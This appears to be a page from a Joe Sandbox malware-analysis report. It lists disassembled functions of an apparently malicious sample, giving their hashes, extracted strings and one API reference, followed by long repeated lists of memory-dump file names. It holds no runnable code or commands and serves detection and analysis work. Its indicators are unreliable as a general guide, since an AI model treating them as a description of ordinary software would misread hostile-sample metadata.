                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: +Ku$wpq
                                                                                                                                                                                                                              • API String ID: 237503144-1953850642
                                                                                                                                                                                                                              • Opcode ID: d40f92f3c1228788356a75c287fd80c77c9467e846c20f18e48cb37618b17b34
                                                                                                                                                                                                                              • Instruction ID: a5740d3f7e55e3745c2eb1c2559f5f536004bb19c195b80381146cd4b349a525
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d40f92f3c1228788356a75c287fd80c77c9467e846c20f18e48cb37618b17b34
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E451CE7220C3558FC324CF29984076FB7E6EBC5310F55892EE5DACB285DB74D50A8B92
                                                                                                                                                                                                                              Function 00FF90D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00FF9170
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: M/($M/(
                                                                                                                                                                                                                              • API String ID: 237503144-1710806632
                                                                                                                                                                                                                              • Opcode ID: ea11b91108a2dd9b3b9d11f12206f0445d0e3e3baa14ddd867da5157d4f58720
                                                                                                                                                                                                                              • Instruction ID: 7f960def798e72adf8061f25d58c3ba0e49fa43f4dc4f368192bbec54eacf260
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea11b91108a2dd9b3b9d11f12206f0445d0e3e3baa14ddd867da5157d4f58720
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8212371A5C3515FE714CE34988179FB7AAEBC6710F01892CE0D1DB1C5D679880B8756
                                                                                                                                                                                                                              Function 00FFA5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: VN$VN$i$i
                                                                                                                                                                                                                              • API String ID: 0-1885346908
                                                                                                                                                                                                                              • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                              • Instruction ID: 5362fec9245a995e34b551037ef9f0e9343400aa20e3e6dd211e0d9ee577efda
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3421F6615483848AD3058F6580402B6BBE3AFC6328F2C465ED2F95B3A1EA37C90D4757
                                                                                                                                                                                                                              Function 00FD9780 Relevance: 4.2, Strings: 3, Instructions: 420COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 1$1D20E9D372052286BEBA0C6A975F1733$A
                                                                                                                                                                                                                              • API String ID: 0-3876885746
                                                                                                                                                                                                                              • Opcode ID: 7ac5692f01d0e3ead38245fc31163e87587b78dac154456bfdcb2ae6d57ad6ee
                                                                                                                                                                                                                              • Instruction ID: 5fd5de99ceca55b7141cefda021d0f9541600a46a4fcc773ae3df4dec01d1a91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ac5692f01d0e3ead38245fc31163e87587b78dac154456bfdcb2ae6d57ad6ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3D1F47550C3508BD718DF64C8517ABBBE2EBC5314F08896DE4D9CB342DB78890ACB96
                                                                                                                                                                                                                              Function 00FE4CA0 Relevance: 3.5, Strings: 2, Instructions: 1046COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
